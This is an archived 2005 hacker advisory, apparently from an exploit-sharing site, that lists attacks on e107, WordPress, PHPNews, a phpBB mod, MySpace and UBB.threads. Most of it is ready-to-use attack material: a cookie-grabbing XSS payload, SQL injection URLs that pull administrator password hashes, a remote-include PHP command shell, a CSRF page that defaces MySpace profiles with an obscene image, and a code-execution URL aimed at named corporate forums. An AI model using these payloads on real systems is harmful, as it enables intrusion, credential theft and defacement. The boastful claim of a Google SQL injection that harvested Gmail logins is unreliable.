what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

multiVulns.txt

multiVulns.txt
Posted Aug 31, 2005
Authored by pacifico, ratboy

Multiple vulnerabilities have been discovered in various CMS and forum software. e107 suffers from a cross site scripting flaw, Wordpress suffers from a SQL injection flaw, PHPNews suffers from a remote inclusion flaw, phpBB suffers from a SQL injection flaw, Google suffers from a SQL injection flaw, and myspace.com suffers from a user profile defacement flaw. Oh.. and UBB 6.3.2 suffers from a remote code execution flaw.

tags | exploit, remote, vulnerability, code execution, xss, sql injection
SHA-256 | 9a74fd1c631bb86cd84d03df760f1891aba24c8535b0f1c98d23a917eb38b163

multiVulns.txt

Change Mirror Download
#################################
# Multi-CMS/Forum Vulnability's #
# Found by ap0c hackers #
# pacifico & ratboy #
#################################

Yo! Ok, well a couple new vulnabilitys have been found by.. us :)

------------------
First; e107 xss---
------------------

[link=http://w000000w00tw00t/asdadLI[link=
onMouseOver='alert(document.cookie);' h1d3="]<[size=24]HIGHLIGHT
ME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link]

Enter this into any message, signature, et cetra, and when highlighted
it will alert with the users cookie. This *may* be furtherly
exploitable; but we are not sure; as we've been very busy ;)

------
next; wordpress blog sql injection ---
------

http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*

This will give the administrator hash for the wordpress blog/CMS. We
have also found that if you spoof you're browser to something like:
<?php phpinfo(); ?>, and have a failed login attempt; it is eval'd,
and you can execute your own code.

------
Now; PHPNews latest release remote include(); exploit
------

http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a

Ok, now you'll need a host, and change (http://path/to/exploit/) to
your host. Now, you will make a directory called "languages". Then in
a file named "en_GB.admin.lng", put something like this code:

<?php
$rawr=$_GET['c'];
echo(`$rawr`);
?>

kthx.


-----
And; Knoledge Base PHPBB Mod SQL Injection Exploit
-----

Righto.. so you find a phpbb forum that says: 'Powered by Knowledge
Base MOD, wGEric & Haplo (c) 2002-2005' at the bottem, eh?

Now, this is totally vulnable. (the mod changes the index.php to kb.php)
http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00

:)


-----
!!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!!
-----

Ok, we expect this to be fixed right away, so be sure to do it quick ;)
Giving google the query:
-b: *++*' UNION SELECT ass,ass from ASS,ass%00/*
Cause's an error of "database gm-google.ass does not exist". We've
gotten a few user/pass's for gmail with this ;)
This is done by confusing googles "calculator", so it does *NOT* check
the query to make sure its valid.

You'd be suprised how insecure google is; when looked at closly. We
also had a bindshell; but they found out; and thats fixed now.


-----
MySpace.com User Profile Defacement.
-----

Once again, this may be fixed very soon.
This code should be efficent;

<?php
$g1=$_GET['t'];
$g2=$_GET['f'];

echo('
<form action="http://myspace.com/index.cfm?fuseaction=user.addComment"
method="post" name="commentForm">

<input type="hidden" name="hashcode"
value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a">
<input type="hidden" name="FriendID" value="' . $f . '24822493">
<input type=hidden name=Mytoken value=' . $t . '>

');

echo ('
<input type="hidden" name="f_comments"
value='%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E'>



<input type="submit" value="Post Comment" onClick="this.disabled =
true; document.commentForm.submit();">
</form>
');
?>

example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617

This would deface profile 6617 if the (t) variable is that users friend.

ktx.

-----
Forums ("UBB.threads™ 6.3.2") Remote Code Execution.
-----

These boards are very popular among corporate sites (*cough*NBC,CNN*cough*)
http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post

This would execute phpinfo(); on the victims server.

##########################
## Thats all for this ##
## "issue" of sweet ##
## sploits... sincerly ##
## pacifico and ratboy ##
##########################
Contact? jbiaso@gmail.com

-EOF-
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close